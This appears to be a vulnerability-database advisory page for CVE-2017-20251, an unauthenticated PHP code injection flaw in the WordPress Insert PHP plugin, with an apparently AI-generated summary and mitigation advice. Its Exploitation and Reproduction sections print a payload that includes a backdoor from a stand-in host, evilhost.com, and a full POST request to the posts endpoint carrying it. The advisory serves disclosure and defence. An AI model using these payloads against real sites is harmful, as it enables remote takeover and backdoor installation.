CVE-2017-20251
Description
WordPress Insert PHP plugin versions prior to 3.3.1 allow unauthenticated attackers to execute arbitrary PHP code via the REST API.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
WordPress Insert PHP plugin versions prior to 3.3.1 allow unauthenticated attackers to execute arbitrary PHP code via the REST API.
Vulnerability
WordPress Insert PHP plugin versions before 3.3.1 contain a PHP code injection vulnerability. This flaw allows unauthenticated attackers to execute arbitrary PHP code by injecting malicious shortcodes through the WordPress REST API. The vulnerability is reachable by sending POST requests to the wp-json/wp/v2/posts endpoint with crafted content containing insert_php shortcodes [2, 3].
Exploitation
An unauthenticated attacker can exploit this vulnerability by sending a POST request to the WordPress REST API's posts endpoint (wp-json/wp/v2/posts). The request body should contain crafted content with insert_php shortcodes that include and execute remote PHP files on the server. For example, an attacker could use a payload like [insert_php] include('http://evilhost.com/file/backdoor.php'); [/insert_php] [3].
Impact
Successful exploitation of this vulnerability allows an attacker to execute arbitrary PHP code on the server. This can lead to remote code execution (RCE), enabling the attacker to compromise the confidentiality, integrity, and availability of the affected WordPress site [2, 3].
Mitigation
Versions of the WordPress Insert PHP plugin prior to 3.3.1 are affected. The fixed version is 3.3.1. Users are strongly advised to update to version 3.3.1 or later to mitigate this vulnerability. No other mitigation or workaround details are available in the provided references [2].
AI Insight generated on Jun 9, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
1Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The plugin improperly processes shortcodes within the WordPress REST API, allowing arbitrary PHP code execution."
Attack vector
Unauthenticated attackers can exploit this vulnerability by sending POST requests to the `/wp-json/wp/v2/posts` endpoint. The request body should contain crafted content with `[insert_php]` or `[php]` shortcodes. These shortcodes can include commands to include and execute remote PHP files on the server, leading to arbitrary code execution [ref_id=1].
Affected code
The vulnerability exists in versions of the Insert PHP plugin prior to 3.3.1. The issue specifically relates to how the plugin handles shortcodes when content is submitted via the WordPress REST API, particularly through the `/wp-json/wp/v2/posts` endpoint [ref_id=1].
What the fix does
The advisory does not specify the exact changes made in version 3.3.1. However, it is stated that the vulnerability is fixed in this version. The fix likely involves sanitizing or properly escaping the content processed through the REST API to prevent the execution of malicious shortcodes and included PHP code.
Preconditions
- authThe attacker does not require any authentication.
- networkThe attacker can reach the WordPress REST API over the network.
- inputThe attacker must be able to craft a POST request with specific shortcodes.
Reproduction
POST http://localhost.com/wp-json/wp/v2/posts/1234 HTTP/1.1 Host: localhost.com User-Agent: Xploit Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.8 Accept-Encoding: gzip,deflate,lzma,sdch Connection: keep-alive content-type: application/json
{ "id": "1234ffff", "title": "by Hacker", "content": "[insert_php] include('http[:]//evilhost.com/file/backdoor.php'); [/insert_php][php] include('http[:]//evilhost.com/file/backdoor.php'); [/php]" } [ref_id=1]
Generated on Jun 9, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3News mentions
0No linked articles in our index yet.